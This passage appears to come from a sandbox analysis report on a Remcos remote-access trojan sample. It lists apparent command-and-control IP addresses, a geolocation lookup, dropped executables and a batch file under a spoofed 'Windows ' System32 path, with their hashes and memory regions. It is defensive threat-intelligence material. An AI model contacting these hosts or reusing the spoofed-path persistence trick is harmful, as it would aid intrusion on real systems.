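    print("named externals: ", named_externals(NETWORK_TABLE))
```

Both raw-IP endpoints in the table (192.3.101.8:55677 and 96.17.179.55:80) surface for review; which process owns each connection has to come from the process tree, not from this table alone. The geoplugin.net request is the geolocation lookup Remcos performs on start-up, and the loopback rows on ports 45671 and 55677 are the sandbox's own view of the same sockets.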

Files

C:\Users\Public\alpha.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Users\Public\xkn.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/3792-17-0x00000172FE180000-0x00000172FE1A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0v2il1s.f1k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3792-27-0x00007FF9B0880000-0x00007FF9B1341000-memory.dmp

memory/3792-28-0x00000172FE520000-0x00000172FE530000-memory.dmp

memory/3792-29-0x00000172FE520000-0x00000172FE530000-memory.dmp

memory/3792-34-0x00007FF9B0880000-0x00007FF9B1341000-memory.dmp

C:\Users\Public\kn.exe

MD5 bd8d9943a9b1def98eb83e0fa48796c2
SHA1 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

C:\Users\Public\Lewxa.txt

MD5 8f6b3132069a25963b93083743e160dd
SHA1 364112fc579f11dfa82a3c1078ec19706cd6dfda
SHA256 5184b2c7c5ffbaf8b8c9bac27545f09447b61d619a2f2bf472570b9ebec5747c
SHA512 af3051aeed9de9931f12d48cd22fef3273f9350a1cdd3c476fa02f7550288f7a96112f311d4dadcf61f0a67c93c22ce2999fb6253c8841b9d399e710b8518938

C:\Users\Public\Libraries\Lewxa.com

MD5 04aba5a372c8dac9affd6f1578b478b3
SHA1 1e0d764539cbf2e86e0d59b83f407b429f61fdb7
SHA256 b27a5e00f3339d8020da21dabc1c53e001bf5d4a809c47cee65f3e9383568411
SHA512 4d69053814b86bd13b59ca8b147a5331d0eace3ed2aaa936dc35086fdba8ef44d757bdc788eec61338f443578f98b8859f8dd7c7eeef486cab9ecb8eb5be15a3

memory/1000-49-0x0000000002320000-0x0000000002321000-memory.dmp

memory/1000-55-0x0000000003F40000-0x0000000004F40000-memory.dmp

memory/1000-56-0x0000000003F40000-0x0000000004F40000-memory.dmp

memory/1000-59-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1000-61-0x0000000002320000-0x0000000002321000-memory.dmp

C:\Windows \System32\7343994.exe

MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

C:\Windows \System32\netutils.dll

MD5 fa7aa88417d0c48807144a1a48fe3fbc
SHA1 6f5ec990b12d4a6075050a94e0d68d03781fa46d
SHA256 2019dcd18ba7d5554a4a9da882740aa883941670af3de9396960081a0f8aa098
SHA512 99b2eb6f8e7d00a3803cba229149e5e0cb67a3deb607782c55fbacd25d9c074cce83759de15490eff939d5ad98f26cdbd44395cc79ffe22753e16c3d9e3b5fff

memory/1456-75-0x00000000613C0000-0x00000000613E3000-memory.dmp

C:\windows \system32\KDECO.bat

MD5 c545650595b479c81ad6b9d8882aae39
SHA1 7a98aa2e6eee23b3c1bba876955d525bc618b3f0
SHA256 a3a80983cb33159f0455fa0135789402558baa1460db94d0071318512b8cb5f9
SHA512 85ac596a7da9072a28c4178e4fdedc98f1b49c8e3fe5612cfe464833297b13f65d2dc59b52d7fc9970cff8f98d954111229aec0ed9dded454e03b0cf4ebb6ff3

memory/1812-84-0x000002B0F1360000-0x000002B0F1370000-memory.dmp

memory/1812-83-0x000002B0F1360000-0x000002B0F1370000-memory.dmp

memory/1812-82-0x00007FF9AECB0000-0x00007FF9AF771000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/1812-92-0x00007FF9AECB0000-0x00007FF9AF771000-memory.dmp

memory/1396-99-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-101-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-102-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-103-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-104-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-107-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-109-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-110-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-111-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-112-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/224-115-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5008-116-0x0000000000400000-0x0000000000462000-memory.dmp

memory/224-119-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5008-121-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4544-120-0x0000000000400000-0x0000000000424000-memory.dmp

memory/224-123-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5008-126-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4544-130-0x0000000000400000-0x0000000000424000-memory.dmp

memory/5008-132-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4544-131-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4544-133-0x0000000000400000-0x0000000000424000-memory.dmp

memory/224-136-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cvmkexyxwegevgpvebjivyygouc

MD5 1e851ac5c5f7c5086508dddc69063a46
SHA1 ec67b2be1b676dc07b54f92b64cabaa8b5c53656
SHA256 0672c1350202839c50058ce7097f6eac6d3788bac87b932f64a6c5f75674eb04
SHA512 e532fb9a86e913de9272d2314bbbf8688e60932e5cb67b8d780a5904545df5ee3a2669b1875c687fe2aa7281198e00b74f6de0d8e3fd9bfac10b0b28b18f5019

memory/1396-138-0x0000000020940000-0x0000000020959000-memory.dmp

memory/1396-141-0x0000000020940000-0x0000000020959000-memory.dmp

memory/1396-143-0x0000000000C00000-0x0000000001C00000-memory.dmp